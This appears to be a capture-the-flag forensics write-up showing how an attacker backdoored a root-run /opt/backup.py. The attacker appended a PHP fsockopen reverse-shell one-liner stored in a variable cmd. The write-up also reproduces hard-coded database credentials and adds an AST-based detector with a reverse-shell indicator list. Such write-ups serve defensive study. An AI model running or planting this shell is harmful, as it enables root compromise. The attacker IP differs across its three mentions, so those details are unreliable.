Somehow, the attacker was able to gain root access to the web server. We believe the attacker leveraged an existing file to gain root access. What file was modified to allow the attacker to gain root on the web server?
Submit the name of the file and the name of the variable used to store the added command. Example:
backdoor.exe is the name of the file and
var1 is the name of the variable.
Use the packet capture from Scans.
When solving the earlier challenge, Scans, we identified a number of network streams containing remote shell traffic. Using that as a starting point, we reviewed those streams in Wireshark. At the very end of stream 4999 the attacker appends two lines to /opt/backup.py: an assignment of a variable named cmd holding a PHP one-liner, and a popen(cmd) call that executes it. The one-liner opens a TCP connection to 184.108.40.206:4815 with fsockopen() and then runs /bin/bash -i with its standard input, output and error redirected to that socket (file descriptor 3), which is an interactive reverse shell. The challenge text says this file is what gave the attacker root, so backup.py must be executed with root privileges (presumably a scheduled backup job), and the next run of the script hands the attacker a root shell. The attacker's cat of the file confirms the change, and incidentally shows the hard-coded MySQL credentials the backup uses.
/>echo "cmd=\"php -r '\$sock=fsockopen(\\\"220.127.116.11\\\",4815);exec(\\\"/bin/bash -i <&3 >&3 2>&3\\\");'\"" >> /opt/backup.py
/>echo "popen(cmd)" >> /opt/backup.py
/>cat /opt/backup.py
#!/usr/bin/env python3
from os import popen
popen('mysqldump -u backup -pbackup123 esu | gzip > /backups/backup_esu_$(date "+%Y%m%d%H%M%S").sql.gz')
cmd="php -r '$sock=fsockopen(\"18.104.22.168\",4815);exec(\"/bin/bash -i <&3 >&3 2>&3\");'"
popen(cmd)
/>exit
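As an added example (not code from the challenge or the original writeup), the following Python script finds this kind of injection statically instead of by reading the stream: it parses a script with the standard ast module, collects every variable assigned a string that carries a reverse-shell indicator, and reports the popen()/system()/subprocess calls that execute such a variable. The embedded file contents are a constructed copy of the cat output in the transcript above (host and port taken from that output as printed); the indicator list, function names and output format are the example's own choices.

```python
"""Flag reverse-shell commands appended to a Python script.

Added example for this writeup, not code from the challenge or its authors.
Pass 1 records variables assigned a string constant that contains a
reverse-shell indicator; pass 2 reports exec-style calls that run one of
those variables. On the constructed sample below it reports the `cmd`
variable of backup.py, which is what the challenge asks for.
"""
import ast
import re

# Substrings that mark a command string as a likely reverse shell.
SHELL_INDICATORS = (
    "fsockopen(",        # PHP socket connect, as used in the modified backup.py
    "/bin/bash -i",      # interactive bash wired to a socket
    "/dev/tcp/",         # bash network redirection
    "nc -e",             # netcat with exec
    "socket.connect(",   # Python one-liner reverse shells
)

# Exec-style functions whose argument is a command: os.popen, os.system,
# subprocess.run/call/Popen/check_output/check_call.
EXEC_FUNCS = {"popen", "system", "run", "call", "Popen", "check_output", "check_call"}

# host,port as written in fsockopen("host",port) or socket.connect(("host",port)).
ENDPOINT_RE = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3})["\']?\s*,\s*(\d{1,5})')


def _call_name(node):
    """Bare function name of a call: popen(...), os.popen(...), subprocess.run(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        return func.attr
    return ""


def find_injected_commands(source):
    """Return one finding per suspicious variable that reaches an exec-style call.

    A finding is a dict: variable name, line of the assignment, line of the
    call that runs it, the command text, and the (host, port) it connects to
    when that can be parsed from the command (None otherwise).
    """
    tree = ast.parse(source)

    # Pass 1: variables assigned a string constant containing an indicator.
    suspicious = {}
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant)
                and isinstance(node.value.value, str)):
            continue
        text = node.value.value
        if any(ind in text for ind in SHELL_INDICATORS):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    suspicious[target.id] = (node.lineno, text)

    # Pass 2: exec-style calls whose argument is one of those variables.
    findings = []
    for node in ast.walk(tree):
        if not (isinstance(node, ast.Call) and _call_name(node) in EXEC_FUNCS):
            continue
        for arg in node.args:
            if isinstance(arg, ast.Name) and arg.id in suspicious:
                assigned_at, text = suspicious[arg.id]
                match = ENDPOINT_RE.search(text)
                findings.append({
                    "variable": arg.id,
                    "assigned_at": assigned_at,
                    "executed_at": node.lineno,
                    "command": text,
                    "endpoint": (match.group(1), int(match.group(2))) if match else None,
                })
    return findings


# Constructed sample: /opt/backup.py as shown by the attacker's `cat` in the
# stream (copied from the transcript, not re-extracted from the pcap).
SAMPLE_BACKUP_PY = r"""#!/usr/bin/env python3
from os import popen
popen('mysqldump -u backup -pbackup123 esu | gzip > /backups/backup_esu_$(date "+%Y%m%d%H%M%S").sql.gz')
cmd="php -r '$sock=fsockopen(\"18.104.22.168\",4815);exec(\"/bin/bash -i <&3 >&3 2>&3\");'"
popen(cmd)
"""

if __name__ == "__main__":
    for f in find_injected_commands(SAMPLE_BACKUP_PY):
        print(f"variable {f['variable']!r} assigned on line {f['assigned_at']}, "
              f"executed on line {f['executed_at']}, connects to {f['endpoint']}")
        print("  command:", f["command"])
```

The script only sees string constants assigned directly to a name, so a command built by concatenation or decoded from base64 at runtime would slip past it; treat it as triage and pair it with integrity monitoring (mtime or hash) of anything root runs from cron, which is what would have caught the two appended lines on /opt/backup.py regardless of their contents.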
The accepted flag was: